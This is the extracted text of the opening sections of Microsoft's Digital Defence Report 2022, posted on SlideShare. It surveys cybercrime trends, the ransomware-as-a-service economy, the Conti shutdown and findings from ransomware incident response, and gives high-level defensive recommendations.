SlideShare a Scribd company logo

original.pdf

B
BeHappy284922

Cybercriminals continue to adapt their techniques in response to improving cyber defences. Ransomware poses a significant threat, with ransomware attacks increasing in scale and sophistication. Nation state actors have also begun incorporating ransomware into their arsenals. Cybercrime operations have become more complex and distributed. Attackers are also exploiting infrastructure like botnets and compromised business networks to host phishing campaigns and mining cryptocurrency covertly. The evolving phishing landscape and use of cybercrime services demonstrate how attackers are adapting to challenges. Overall, the threat landscape continues to grow more sophisticated as attackers refine their methods.

1 of 114
Download to read offline
Microsoft Digital Defence Report 2022 Illuminating the threat landscape and empowering a digital defence.
Contents The data, insights and events in this report are from July 2021 through June 2022 (Microsoft fiscal year 2022), unless otherwise noted. For the best experience viewing and navigating this report, we recommend using Adobe Reader, available as a free download from the Adobe website. Report Introduction 02 The State of Cybercrime 06 An overview of The State of Cybercrime 07 Introduction 08 Ransomware and extortion: A nation-level threat 09 Ransomware insights from front-line responders 14 Cybercrime-as-a-Service 18 The evolving phishing threat landscape 21 A timeline of botnet disruption from Microsoft’s early days of collaboration 25 Cybercriminal abuse of infrastructure 26 Is hacktivism here to stay? 28 Nation State Threats 30 An overview of Nation State Threats 31 Introduction 32 Background on nation state data 33 Sample of nation state actors and their activities 34 The evolving threat landscape 35 The IT supply chain as a gateway to the digital ecosystem 37 Rapid vulnerability exploitation 39 Russian state actors’ wartime cyber tactics threaten Ukraine and beyond 41 China expanding global targeting for competitive advantage 44 Iran growing increasingly aggressive following power transition 46 North Korean cyber capabilities employed to achieve regime’s three main goals 49 Cyber mercenaries threaten the stability of cyberspace 52 Operationalising cybersecurity norms for peace and security in cyberspace 53 Devices and Infrastructure 56 An overview of Devices and Infrastructure 57 Introduction 58 Governments acting to improve critical infrastructure security and resilience 59 IoT and OT exposed: Trends and attacks 62 Supply chain and firmware hacking 65 Spotlight on firmware vulnerabilities 66 Reconnaissance-based OT attacks 68 Cyber Influence Operations 71 An overview of Cyber Influence Operations 72 Introduction 73 Trends in cyber influence operations 74 Influence operations during the COVID-19 pandemic and Russia’s invasion of Ukraine 76 Tracking the Russian Propaganda Index 78 Synthetic media 80 A holistic approach to protect against cyber influence operations 83 Cyber Resilience 86 An overview of Cyber Resilience 87 Introduction 88 Cyber resiliency: A crucial foundation of a connected society 89 The importance of modernising systems and architecture 90 Basic security posture is a determining factor in advanced solution effectiveness 92 Maintaining identity health is fundamental to organisational well-being 93 Operating system default security settings 96 Software supply chain centrality 97 Building resilience to emerging DDoS, web application and network attacks 98 Developing a balanced approach to data security and cyber resiliency 101 Resilience to cyber influence operations: The human dimension 102 Fortifying the human factor with skilling 103 Insights from our ransomware elimination program 104 Act now on quantum security implications 105 Integrating business, security and IT for greater resilience 106 The cyber resilience bell curve 108 Contributing Teams 110 01 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Foreign actors are also using highly effective techniques to enable propaganda influence operations in regions around the globe, as covered in the third chapter. For example, Russia has worked hard to convince its citizens, and the citizens of many other countries, that its invasion of Ukraine was justified – while also sowing propaganda discrediting COVID vaccines in the West and simultaneously promoting their effectiveness at home. In addition, actors are increasingly targeting Internet of Things (IoT) devices or Operational Technology (OT) control devices as entry points to networks and critical infrastructure which is discussed in chapter four. Finally, in the last chapter, we provide the insights and lessons we have learned from over the past year defending against attacks directed at Microsoft and our customers as we review the year’s developments in cyber resilience. Each chapter provides the key lessons learned and insights based on Microsoft’s unique vantage point. The trillions of signals we analyse from our worldwide ecosystem of products and services reveal the ferocity, scope and scale of digital threats across the globe. Microsoft is taking action to defend our customers and the digital ecosystem against these threats, and you can read about our technology that identifies and blocks billions of phishing attempts, identity thefts and other threats to our customers. A snapshot of our landscape… Scope and scale of threat landscape The volume of password attacks has risen to an estimated 921 attacks every second – a 74% increase in just one year. Dismantling cybercrime To date, Microsoft removed more than 10,000 domains used by cybercriminals and 600 used by nation state actors. Addressing vulnerabilities 93% of our ransomware incident response engagements revealed insufficient controls on privilege access and lateral movement. “The trillions of signals we analyse from our worldwide ecosystem of products and services reveal the ferocity, scope and scale of digital threats across the globe” On February 23, 2022, the cybersecurity world entered a new age, the age of the hybrid war. On that day, hours before missiles were launched and tanks rolled across borders, Russian actors launched a massive destructive cyberattack against Ukrainian government, technology and financial sector targets. You can read more about these attacks and the lessons to be learned from them in the Nation State Threats chapter of this third annual edition of the Microsoft Digital Defence Report (MDDR). Key among those lessons is that the cloud provides the best physical and logical security against cyberattacks and enables advances in threat intelligence and end point protection that have proven their value in Ukraine. While any survey of the year’s developments in cybersecurity must begin there, this year’s report provides a deep dive into much more. In the report’s first chapter, we focus on activities of cybercriminals, followed by nation state threats in chapter two. Both groups have greatly increased the sophistication of their attacks which has dramatically increased the impact of their actions. While Russia drove headlines, Iranian actors escalated their attacks following a transition of presidential power, launching destructive attacks targeting Israel and ransomware and hack-and-leak operations targeting critical infrastructure in the United States. China also increased its espionage efforts in Southeast Asia and elsewhere in the global south, seeking to counter US influence and steal critical data and information. Introduction by Tom Burt Corporate Vice President, Customer Security & Trust 02 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
The state of cybercrime Cybercriminals continue to act as sophisticated profit enterprises. Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. At the same time, cybercriminals are becoming more frugal. To lower their overhead and boost the appearance of legitimacy, attackers are compromising business networks and devices to host phishing campaigns, malware or even use their computing power to mine cryptocurrency. Find out more on p6 Nation state threats Nation state actors are launching increasingly sophisticated cyberattacks designed to evade detection and further their strategic priorities. The advent of cyberweapon deployment in the hybrid war in Ukraine is the dawn of a new age of conflict. Russia has also supported its war with information influence operations, using propaganda to impact opinions in Russia, Ukraine and globally. Outside Ukraine, nation state actors have increased activity and have begun using advancements in automation, cloud infrastructure and remote access technologies to attack a wider set of targets. Corporate IT supply chains that enable access to ultimate targets were frequently attacked. Cybersecurity hygiene became even more critical as actors rapidly exploited unpatched vulnerabilities, used both sophisticated and brute force techniques to steal credentials and obfuscated their operations by using opensource or legitimate software. In addition, Iran joins Russia in the use of destructive cyberweapons, including ransomware, as a staple of their attacks. These developments require urgent adoption of a consistent, global framework that prioritises human rights and protects people from reckless state behaviour online. All nations must work together to implement norms and rules for responsible state conduct. Find out more on p30 Devices and infrastructure The pandemic, coupled with rapid adoption of internet-facing devices of all kinds as a component of accelerating digital transformation, has greatly increased the attack surface of our digital world. As a result, cybercriminals and nation states are quickly taking advantage. While the security of IT hardware and software has strengthened in recent years, the security of IoT and OT devices security has not kept pace. Threat actors are exploiting these devices to establish access on networks and enable lateral movement, to establish a foothold in a supply chain or to disrupt the target organisation’s OT operations. Find out more on p56 We also use legal and technical means to seize and shut down infrastructure used by cybercriminals and nation state actors and notify customers when they are being threatened or attacked by a nation state actor. We work to develop increasingly effective features and services that use AI/ML technology to identify and block cyber threats and security professionals defend against and identify cyber-intrusions more rapidly and effectively. Perhaps most importantly, throughout the MDDR we offer our best advice on the steps individuals, organisations and enterprises can take to defend against these increasing digital threats. Adopting good cyber hygiene practices is the best defence and can significantly reduce the risk of cyberattacks. Introduction by Tom Burt Continued ‘The advent of cyberweapon deployment in the hybrid war in Ukraine is the dawn of a new age of conflict.’ 03 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Cyber Resilience Cyber Influence Operations Devices and Infrastructure Contributing Teams Cyber Resilience Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
34.7 bn identity threats blocked 37 bn email threats blocked 2.5 bn endpoint signals analysed daily 43 tn signals synthesised daily, using sophisticated data analytics and AI algorithms to understand and protect against digital threats and criminal cyberactivity. 8,500+ engineers, researchers, data scientists, cybersecurity experts, threat hunters, geopolitical analysts, investigators and frontline responders across 77 countries. 15,000+ partners in our security ecosystem who increase cyber resilience for our customers. Cyber resilience Security is a key enabler of technological success. Innovation and enhanced productivity can only be achieved by introducing security measures that make organisations as resilient as possible against modern attacks. The pandemic has challenged us at Microsoft to pivot our security practices and technologies to protect our employees wherever they work. This past year, threat actors continued to take advantage of vulnerabilities exposed during the pandemic and the shift to a hybrid work environment. Since then, our principal challenge has been managing the prevalence and complexity of various attack methods and increased nation state activity. In this chapter, we detail the challenges we have faced, and the defences we have mobilised in response with our more than 15,000 partners. Find out more on p86 Our unique vantage point July 1, 2021 through June 30, 2022 Introduction by Tom Burt Continued Cyber influence operations Nation states are increasingly using sophisticated influence operations to distribute propaganda and impact public opinion both domestically and internationally. These campaigns erode trust, increase polarisation and threaten democratic processes. Skilled Advanced Persistent Manipulator actors are using traditional media together with internet and social media to vastly increase the scope, scale and efficiency of their campaigns, and the outsized impact they are having in the global information ecosystem. In the past year, we have seen these operations used as part of Russia’s hybrid war in Ukraine, but have also seen Russia and other nations, including China and Iran, increasingly deploy propaganda operations powered by social media to extend their global influence on a range of issues. Find out more on p71 04 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
We believe Microsoft – independently and through close partnerships with others in private industry, government and civil society – has a responsibility to protect the digital systems that underpin the social fabric of our society and promote safe, secure computing environments for every person, wherever they are located. This responsibility is the reason we have published the MDDR each year since 2020. The report is the culmination of Microsoft’s vast data and comprehensive research. It shares our unique insights on how the digital threat landscape is evolving and the crucial actions that can be taken today to improve the security of the ecosystem. We hope to instil a sense of urgency, so readers take immediate action based on the data and insights we present both here and in our many cybersecurity publications throughout the year. As we consider the gravity of the threat to the digital landscape – and its translation into the physical world – it is important to remember that we are all empowered to take action to protect ourselves, our organisations and enterprises against digital threats. Introduction by Tom Burt Continued Thank you for taking the time to review this year’s Microsoft Digital Defence Report. We hope you will find that it provides valuable insight and recommendations to help us collectively defend the digital ecosystem. Tom Burt Corporate Vice President, Customer Security & Trust Our objective with this report is twofold: 1 To illuminate the evolving digital threat landscape for our customers, partners and stakeholders spanning the broader ecosystem, shining a light on both new cyberattacks and evolving trends in historically persistent threats. 2   To empower our customers and partners to improve their cyber resiliency and respond to these threats. 05 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
The State of Cybercrime As cyber defences improve and more organisations are taking a proactive approach to prevention, attackers are adapting their techniques. An overview of The State of Cybercrime 07 Introduction 08 Ransomware and extortion: A nation-level threat 09 Ransomware insights from front-line responders 14 Cybercrime-as-a-Service 18 The evolving phishing threat landscape 21 A timeline of botnet disruption from Microsoft’s early days of collaboration 25 Cybercriminal abuse of infrastructure 26 Is hacktivism here to stay? 28 06 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Cyber Resilience Cyber Influence Operations Devices and Infrastructure Nation State Threats Report Introduction Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience Contributing Teams Cyber Resilience Cyber Influence Operations Devices and Infrastructure Nation State Threats Report Introduction
An overview of The State of Cybercrime As cyber defences improve and more organisations are taking a proactive approach to prevention, attackers are adapting their techniques. Cybercriminals continue to act as sophisticated profit enterprises. Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. At the same time, cybercriminals are becoming more frugal. To lower their overhead and boost the appearance of legitimacy, attackers are compromising business networks and devices to host phishing campaigns, malware or even use their computing power to mine cryptocurrency. The threat of ransomware and extortion is becoming more audacious with attacks targeting governments, businesses and critical infrastructure. Human operated ransomware is most prevalent, as one-third of targets are successfully compromised by criminals using these attacks and 5% of those are ransomed. Cybercrime continues to rise as the industrialisation of the cybercrime economy lowers the skill barrier to entry by providing greater access to tools and infrastructure. Credential phishing schemes which indiscriminately target all inboxes are on the rise and business email compromise, including invoice fraud, poses a significant cybercrime risk for enterprises. To disrupt the malicious infrastructures of cybercriminals and nation state actors, Microsoft relies on innovative legal approaches and our public and private partnerships. Find out more on p9 Find out more on p18 Attackers increasingly threaten to disclose sensitive data to encourage ransom payments. Find out more on p10 Find out more on p21 Find out more on p25 Find out more on p9 The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. A RaaS program (or syndicate) is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. Many RaaS programs incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services. Affiliates are generally small groups of people “affiliated” with one or more RaaS programs. Their role is to deploy the RaaS program payloads. Affiliates move laterally in the network, persist on systems, and exfiltrate data. Each affiliate has unique characteristics, such as different ways of doing data exfiltration. Access brokers sell network access to other cybercriminals, or gain access themselves via malware campaigns, brute force, or vulnerability exploitation. Access broker entities can range from large to small. Top tier access brokers specialize in high-value network access, while lower tier brokers on the dark web might have just 1–2 usable stolen credentials for sale. Organizations and individuals with weak cybersecurity hygiene practices are at greater risk of having their network credentials stolen. Operators Access brokers Understanding the ransomware economy Affiliates Conti HIVE Black Matter LockBit REvil BlackCat falls victim to a successful ransomware event are successfully compromised Access brokers sell access to compromised networks to Ransomware-as-a-Service affiliates, who run the ransomware attack RaaS affiliates prioritise targets by intended impact or perceived profit Attackers take advantage of any security weakness they find in the network, so attacks vary The ransomware payload is the culmination of a chain of malicious activity encounter activity associated with known ransomware attackers potential target organisations 1 20 60 2,500 Factors Low barrier to entry Human operated ransomware targeting and rate of success model p15 The most effective defence against ransomware includes multifactor authentication, frequent security patches and Zero Trust principles across network architecture. Find out more on p13 Ransomware Pre-ransomware 2022 BEC Themes (January-June 202 9.3% 1.9% Gift card scam Invoice fraud 4.6% Payroll redirection 4.3% Business information 07 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
As cyber defences improve and more governments and businesses take a proactive approach to prevention, we see attackers using two strategies to gain access required to facilitate cybercrime. One approach is a campaign with broad targets that relies on volume. The other uses surveillance and more selective targeting to increase the rate of return. Even when revenue generation is not the objective – such as nation state activity for geopolitical purposes – both random and targeted attacks are used. This past year, cybercriminals continued to rely on social engineering and exploitation of topical issues to maximise the success of campaigns. For example, while COVID-themed phishing lures were used less frequently, we observed lures soliciting donations to support the citizens of Ukraine increasing. Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. We have observed cybercriminals becoming more frugal and attackers are no longer paying for technology. To lower their overhead and boost the appearance of legitimacy, some attackers increasingly seek to compromise businesses to host phishing campaigns, malware or even use their computing power to mine cryptocurrency. In this chapter, we also examine the rise in hacktivism, a disruption caused by private citizens conducting cyberattacks to further social or political goals. Thousands of individuals around the world, both experts and novices, have mobilised since February 2022 to launch attacks such as disabling websites and leaking stolen data as part of the Russia-Ukraine war. It is too soon to predict whether this trend will continue after the end of active hostilities. Organisations must regularly review and strengthen access controls and implement security strategies to defend against cyberattacks. However, that is not all they can do. We explain how our Digital Crimes Unit (DCU) has used civil cases to seize malicious infrastructure used by cybercriminals and nation state actors. We must fight this threat together through both public and private partnerships. We hope that by sharing what we have learned over the past 10 years, we will help others understand and consider the proactive measures they can take to protect themselves and the wider ecosystem against the continually growing threat of cybercrime. Amy Hogan-Burney General Manager, Digital Crimes Unit Cybercrime continues to rise, with increases in both random and targeted attacks. Introduction 08 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
falls victim to a successful ransomware event are successfully compromised Access brokers sell access to compromised networks to Ransomware-as-a-Service affiliates, who run the ransomware attack RaaS affiliates prioritise targets by intended impact or perceived profit Attackers take advantage of any security weakness they find in the network, so attacks vary The ransomware payload is the culmination of a chain of malicious activity encounter activity associated with known ransomware attackers potential target organisations 1 20 60 2,500 Factors Low barrier to entry Human operated ransomware targeting and rate of success model p15 • Also in May, an attack caused flight delays and cancellations for one of India’s largest airlines, leaving hundreds of passengers stranded.4 The success of these attacks and the extent of their real-world impacts are the result of an industrialisation of the cybercrime economy, enabling access to tooling and infrastructure and expanding cybercriminal capabilities by lowering their skill barrier to entry. In recent years, ransomware has moved from a model where a single ‘gang’ would both develop and distribute a ransomware payload to the Ransomware as-a-Service (RaaS) model. RaaS allows one group to manage the development of the ransomware payload and provide services for payment and extortion via data leakage to other cybercriminals – the ones who actually launch the ransomware attacks – referred to as ‘affiliates’ for a cut of the profits. This franchising of the cybercrime economy has expanded the attacker pool. The industrialisation of cybercriminal tooling has made it easier for attackers to perform intrusions, exfiltrate data and deploy ransomware. Human operated ransomware5 – a term coined by Microsoft researchers to describe threats driven by humans who make decisions at every stage of the attacks based on what they discover in their target’s network and delineate the threat from commodity ransomware attacks – remains a significant threat to organisations. Ransomware and extortion: A nation-level threat Ransomware attacks pose an increased danger to all individuals as critical infrastructure, businesses of all sizes and state and local governments are targeted by criminals leveraging a growing cybercriminal ecosystem. Over the past two years, high profile ransomware incidents – such as those involving critical infrastructure, healthcare and IT service providers – have drawn considerable public attention. As ransomware attacks have become more audacious in scope, their effects have become more wide ranging. The following are examples of attacks we’ve seen already in 2022: • In February, an attack on two companies affected the payment processing systems of hundreds of petrol stations in northern Germany.1 • In March, an attack against Greece’s postal service temporarily disrupted mail delivery and impacted the processing of financial transactions.2 • In late May, a ransomware attack against Costa Rican government agencies forced a national emergency to be declared after hospitals were shut down and customs and tax collection disrupted.3 Model based on Microsoft Defender for Endpoint (EDR) data (January-June 2022). 09 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Digital threat activity is at an all-time high and the level of sophistication increases every day. Expanding relationships between specialised cybercriminals have increased the pace, sophistication and success of ransomware attacks. This has driven the evolution of the cybercriminal ecosystem into connected players with different techniques, goals and skillsets that support each other on initial access to targets, payment services and decryption or publication tools or sites. Ransomware operators can now purchase access to organisations or government networks online or obtain credentials and access via interpersonal relationships with brokers whose main objective is solely to monetise the access they have gained. The operators then use the purchased access to deploy a ransomware payload bought via dark web marketplaces or forums. In many cases, negotiations with victims are conducted by the RaaS team, not the operators themselves. These criminal transactions are seamless and the participants risk little chance of being arrested and charged due to the anonymity of the dark web and difficulty enforcing laws transnationally. A sustainable and successful effort against this threat will require a whole-of-government strategy to be executed in close partnership with the private sector. Ransomware attacks have become even more impactful as the adoption of a double extortion monetisation strategy has become a standard practice. This involves exfiltrating data from compromised devices, encrypting the data on the devices and then posting or threatening to post the stolen data publicly to pressure victims into paying a ransom. Although most ransomware attackers opportunistically deploy ransomware to whatever network they get access, some purchase access from other cybercriminals, leveraging connections between access brokers and ransomware operators. Our unique breadth of signal intelligence is gathered from multiple sources – identity, email, endpoints and cloud – and provides insight into the growing ransomware economy, complete with an affiliate system which includes tools designed for less technically-abled attackers. Ransomware and extortion: A nation-level threat Continued 10 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Contrary to how ransomware is sometimes portrayed in the media, it is rare for a single ransomware variant to be managed by one end-to-end ‘ransomware gang’. Instead, there are separate entities that build malware, gain access to victims, deploy ransomware and handle extortion negotiations. The industrialisation of the criminal ecosystem has led to: • Access brokers that break in and hand off access (Access-as-a-Service). • Malware developers that sell tooling. • Criminal operators and affiliates that conduct intrusions. • Encryption and extortion service providers that take over monetisation from affiliates (RaaS). All human-operated ransomware campaigns share common dependencies on security weaknesses. Specifically, attackers usually take advantage of an organisation’s poor cyber hygiene, which often includes infrequent patching and failure to implement multifactor authentication (MFA). The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. A RaaS program (or syndicate) is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. Many RaaS programs incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure and cryptocurrency transaction services. Affiliates are generally small groups of people ‘affiliated’ with one or more RaaS programs. Their role is to deploy the RaaS program payloads. Affiliates move laterally in the network, persist on systems and exfiltrate data. Each affiliate has unique characteristics, such as different ways of doing data exfiltration. Access brokers sell network access to other cybercriminals, or gain access themselves via malware campaigns, brute force or vulnerability exploitation. Access broker entities can range from large to small. Top tier access brokers specialise in high-value network access, while lower tier brokers on the dark web might have just one-to-two usable stolen credentials for sale. Organisations and individuals with weak cybersecurity hygiene practices are at greater risk of having their network credentials stolen. Operators Access brokers Understanding the ransomware economy Affiliates Conti HIVE Black Matter LockBit REvil BlackCat 11 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Case study: The dissolution of Conti Conti, one of the top ransomware variants over the past two years, began shutting down operations in mid-2022, with the Microsoft Threat Intelligence Centre (MSTIC) observing a significant decrease in activity in late March and early April. We observed the last Conti ransomware deployments in mid-April. However, much like the shuttering of other ransomware operations, Conti’s dissolution did not have a significant impact on ransomware deployments, as MSTIC observed Conti affiliates pivoting to deploy other ransomware payloads, including BlackBasta, Lockbit 2.0, LockbitBlack and HIVE. This is consistent with data from previous years and suggests that when ransomware gangs go offline, they re-emerge months later or redistribute their technical capabilities and resources to new groups. Our Microsoft threat intelligence teams track ransomware threat actors as individual groups (labelled as DEVs) based on their specific tools, rather than tracking them by the malware they use. This meant that when Conti’s affiliates dispersed, we were able to continue tracking these DEVs through their use of other tools or RaaS kits. For example: • DEV-0230, which is affiliated with Trickbot, had been a prolific user of Conti. In late April, MSTIC observed it using QuantumLocker. • DEV-0237 shifted from Conti’s ransomware kit to HIVE and Nokoyawa, including using HIVE in the May 31 attack against Costa Rican government agencies. • DEV-0506, another prolific user of the Conti ransomware kit, was observed using BlackBasta. Example of an affiliate (DEV-0237) quickly shifting between RaaS programs After a RaaS program such as Conti is shut down, the ransomware affiliate shifts to another one (Hive) almost immediately. Jan Ryuk 2020-Jun 2021 Hive Oct 2021-present BlackCat Mar 2022-present Nokoyawa May 2022-present Agenda etc. June 2022 (experimenting) 2021 2022 Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec Jan Feb Mar Apr May Jun Conti Jul-Oct 2021 RaaS evolves the ransomware ecosystem and hinders attribution Because human-operated ransomware is driven by individual operators, attack patterns vary based on the target and alternate throughout the duration of an attack. In the past, we observed a close relationship between the initial entry vector, tools and ransomware payload choices in each campaign of a single ransomware strain. This made attribution easier. The RaaS affiliate model, however, decouples this relationship. As a result, Microsoft tracks ransomware affiliates deploying payloads in specific attacks, rather than tracking the ransomware payload developers as operators. Put another way, we no longer assume the HIVE developer is the operator behind a HIVE ransomware attack; it is more likely to be an affiliate. The cybersecurity industry has struggled to adequately capture this delineation between developers and operators. The industry still often reports a ransomware incident by its payload name, giving the false impression that a single entity, or ransomware gang, is behind all attacks using that particular ransomware payload, and all incidents associated with it share common techniques and infrastructure. To support network defenders, it is important to learn more about the stages that precede different affiliates’ attacks – such as data exfiltration and additional persistence mechanisms – and the detection and protection opportunities that might exist. More so than malware, attackers need credentials to succeed in their operations. The successful human operated ransomware infection of an entire organisation relies on access to a highly privileged account. 12 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Spotlight on human-operated ransomware attacks Over the past year, Microsoft’s ransomware experts conducted deep investigations into more than 100 human- operated ransomware incidents to track attackers’ techniques and understand how to better protect our customers. It is important to note that the analysis we share here is possible only for onboarded, managed, devices. Non-onboarded, unmanaged devices represent the least secure part of an organisation’s hardware assets. A durable security strategy Combating and preventing attacks of this nature requires a shift in an organisation’s mindset to focus on the comprehensive protection required to slow and stop attackers before they can move from the pre-ransomware phase to the ransomware deployment phase. Enterprises must apply security best practices consistently and aggressively to their networks, with the goal of mitigating classes of attacks. Due to the human decision making these ransomware attacks can generate multiple, seemingly disparate security product alerts which can easily get lost or not responded to in time. Alert fatigue is real, and security operations centres (SOCs) can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats cannot only reduce alert volume, but also stop many attackers before they get access to networks. Organisations must maintain continuous high standards of security posture and network hygiene to protect themselves from human-operated ransomware attacks. The typical human-operated attack Human-operated ransomware attacks can be categorised into the pre-ransomware phase and the ransomware deployment phase. During the pre-ransomware phase, attackers prepare to infiltrate the network by learning about the organisation’s typology and security infrastructure. Deployment! Stop the attackers before they reach the ransomware deployment phase Attackers prepare to infiltrate the network by learning as much as possible about the topology and security infrastructure. Attackers may also exfiltrate data in this phase. Attackers aim to encrypt as much data as possible. This phase can last only minutes. This phase can range from a few days to several weeks or months, although it has been shortening over the past two years. Ransomware Pre-ransomware Our investigations found most actors behind human-operated ransomware attacks take advantage of similar security weaknesses and share common attack patterns and techniques. Most prevalent ransomware phase techniques: 75% Use admin tools. 75% Use acquired elevated compromised user account to spread malicious payloads through SMB protocol. 99% Attempt to tamper with discovered security and backup products using OS-built tools. Actionable insights Ransomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy. 1 Build credential hygiene. More so than malware, attackers need credentials to succeed in their operations. The successful human-operated ransomware infection of an entire organisation relies on access to a highly privileged account like a Domain Administrator, or abilities to edit a Group Policy. 2 Audit credential exposure. 3 Prioritise deployment of Active Directory updates. 4 Prioritise cloud hardening. 5 Reduce the attack surface. 6 Harden internet-facing assets and understand your perimeter. 7 Reduce SOC alert fatigue by hardening your network to reduce volume and preserve bandwidth for high priority incidents. Links to further information RaaS: Understanding the cybercrime gig economy and how to protect yourself | Microsoft Security Blog Human-operated ransomware attacks: A preventable disaster | Microsoft Security Blog 13 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Ransomware insights from front-line responders Organisations worldwide experienced a steady growth in human-operated ransomware attacks beginning in 2019. However, law enforcement operations and geopolitical events in the last year had a significant impact on cybercriminal organisations. Microsoft’s Security Service Line supports customers through an entire cyberattack, from investigation to successful containment and recovery activities. The response and recovery services are offered via two highly integrated teams, with one focusing on the investigation and groundwork for recovery and the second one on containment and recovery. This section presents a summary of findings based on ransomware engagements over the past year. Ransomware incident and recovery engagements by industry Manufacturing 28% IT 4% Finance 8% Government 8% Health 20% Energy 8% Education 8% Consumer retail 16% As new small groups and threats emerge, defending teams must be aware of evolving ransomware threats while protecting against previously unknown ransomware malware families. The rapid development approach used by criminal groups led to the creation of intelligent ransomware packaged in easy-to-use kits. This allows greater flexibility in launching widespread attacks on a higher number of targets. The following pages provide a deeper look at the most commonly observed contributing factors to weak protection against ransomware, grouped into three categories of findings: 1. Weak identity controls 2. Ineffective security operations 3. Limited data protection 93% of Microsoft investigations during ransomware recovery engagements revealed insufficient privilege access and lateral movement controls. Summary of most common findings in ransomware response engagements Low maturity security operations Insufficient application security practices Limited adoption of modern security frameworks Insufficient privilege access and lateral movement controls Insecure configuration of identity provider No multifactor authentication Lack of information protection control 62% 74% 87% 93% 86% 74% 65% The most common finding among ransomware incident response engagements was insufficient privilege access and lateral movement controls. 14 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
